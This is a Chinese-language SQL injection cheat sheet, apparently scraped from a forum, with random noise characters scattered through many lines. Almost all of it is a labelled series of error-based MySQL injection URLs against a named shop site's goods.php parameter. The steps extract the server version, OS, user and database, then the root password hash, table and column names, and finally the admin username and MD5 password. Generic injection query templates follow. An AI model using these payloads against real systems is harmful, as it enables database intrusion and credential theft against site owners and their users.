判断版本号
# v7 q; X1 P1 j% ~1 rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' r6 q4 I8 E6 Y0 H2 q
0 b; B- h! B8 _2 x! b) d
判断系统
! W* C3 ?; x0 ^: i) A7 |
: s/ s. P2 ]1 u$ T; A- ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. z% Y5 P9 I6 i* M0 }5 S+ b
8 ]' M6 \) u! V4 y7 p* F8 R: `/ c0 V$ J; {6 ?; V3 V) |
) k1 k1 o. o( x. O- {0 \, d当前 user()- U7 [- ~; i; |4 O5 G4 p- b
0 Y9 b; A! R% @
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# v+ r- ^" L& c& b- D- {% U; x1 b$ s$ a5 E' S' g7 b
6 b! } j/ p7 }2 m& X3 h
# E, Z9 }/ I! s; T b" i
当前 database(), h |# P( `& o+ a3 t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# ^" g% Q$ f3 K0 x9 k' u4 l
1 |* `7 t6 g) g7 |# Y" ~: n
& c/ i$ K. V2 {7 a3 J
/ F- x1 b, |8 } ?
6 ?5 ~. I* X) F/ u3 F# droot hash
% p- o: P# |) Y1 q! j. d/ Y
& |0 \! i2 J/ w8 z3 ]8 ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 T# V3 y8 A" b
# n1 K+ f# P, u) d: P0 @* X0 X' f( e* E9 \; h D+ c7 R
1 \8 |8 |) F$ p- c7 L3 R8 A
当前 数据库表名- r* |& O3 K3 |' \4 t/ a
& d9 @: n) Z$ h- \& \; D) t
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 u8 o! A7 ?; u6 z" l1 J! I" O/ j e1 ?# \
: D9 p2 E- }! v/ ?
" w, v; a8 v+ \& K3 A1 E: g& u
当前 数据库 user_name 字段9 t4 b* C7 ~* i- d, z* e
4 V5 B; b* L$ B% h0 N, bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- {# g# I" P$ V" M# j% O! U* u' a! j |7 a& u% _# @( l4 r) ^
当前 数据库 字段 password
$ U" p: Z) d, j8 R' a: P! ]; nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23# `9 v' M% n4 Q4 I+ K% D
8 p; o6 Y v7 k$ o
0 n8 R4 H) U8 k: d! ~0 b" U2 b- o3 Z$ q. N
获得 admin passwd(md5)
2 A+ a4 c5 x$ k" s/ G5 L# }5 P. ^5 l0 h3 Z! Z: i8 d
& i. S$ j: p B: w8 y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 A$ e6 i) p Y$ d% j
; S5 g; F8 L* t6 y报错注射
% e% X2 O6 s9 p* X% Z! hSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ Q, S) Q0 r6 p* C" @# f
) `0 M# k3 q5 [, ?8 C
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# u% i3 `6 [ G0 f! Q8 s; \, M$ }/ k Q- b, T' l
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |